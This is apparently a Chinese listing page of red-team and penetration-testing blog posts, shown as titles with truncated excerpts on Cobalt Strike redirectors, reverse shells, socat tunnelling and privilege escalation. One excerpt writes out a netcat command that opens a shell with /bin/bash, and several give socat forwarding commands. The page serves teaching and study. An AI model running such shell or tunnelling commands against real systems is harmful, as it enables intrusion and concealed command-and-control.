免责声明本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号不为此承担任何责任。前言本文为B站国资社畜大佬《你想有多PWN》视频教...
Cobalt Strike 重定向器
cobalt strike 通过重定向器来隐藏 c2 服务器. 本质其实就是用其它机器作为中转来连接 teamserver 以下提供两种方式, 端口转发工具不仅限于 socat http beacon...
红队网络基础设施建设
在设计红队的网络基础设施架构时,要考虑到否能够提供长期(数周、数月、数年)和稳定的响应服务。 设计注意事项 (Design Considerations) 功能分离 (Functional Segre...
获得 Linux 交互式 Shell
利用 nc bash 反弹的 shell 虽然能执行一些基本的命令. 但对于 su sudo vim 这些需要交互的程序 就没有什么卵用. su: must be run from a termina...
Linux反弹Shell的一些方法
Netcat目标机:nc -lp [监听端口] -e /bin/bash攻击机:nc [目标IP] [目标监听的端口]Socat目标机:socat TCP-LISTEN:[监听端口号] EXEC:/b...
Privilege Escalation 权限提升
第 1 章 前言 这是 tryhackme 渗透测试章节的最后一个房间。原本想谷歌机翻然后我手工看一下,但是感觉这样练习不了英文,所以全部手工翻译,实在翻不出来再交给谷歌。手工翻译不免存在勘误,建议英...
HackaSat2020预选赛beckley
感谢ChatGPT在我学习过程中给我的帮助Hack-A-Sat 是美国办的太空信息安全挑战,最近发现本书《Hack-A-Sat太空信息安全挑战赛深度题解》讲2020年预选赛的题解,在 github 上...
隧道——SOCAT
隧道——SOCAT前言SOCAT被称为nc++(增强版nc)双向数据流通道工具环境kali:192.168.1.14路由器:192.168.1.11、kali作为客户端连接端口socat - tcp:...
一次艰难的PostgreSQL不出网提权过程
Part1 前言 在日常的内网横向过程中,对于SMB、Mysql、SSH、Sqlserver、Oracle等服务的弱口令爆破是常用手段,重复的红队攻防比赛使得这些服务的弱口令越来...
第22篇:一次艰难的PostgreSQL不出网提权过程
Part1 前言 在日常的内网横向过程中,对于SMB、Mysql、SSH、Sqlserver、Oracle等服务的弱口令爆破是常用手段,重复的红队攻防比赛使得这些服务的弱口令越来...
红队笔记专属-shell备忘录
前言: 建议直接复制粘贴到笔记,或点赞收藏,因为时常会用到,这是整理的一些常见的反向shell和特权提升的笔记文档,红队成员必会! 最全。 反向shell-备忘录: 通常在获得远程代码执行之后,我们希...
socat端口映射穿透内网
端口映射将WEB服务器的80端口映射到ubuntu上的80端口ubuntu执行socat -d -d -d tcp-l:8080,reuseaddr,bind=0.0.0.0,fork tcp-l:3...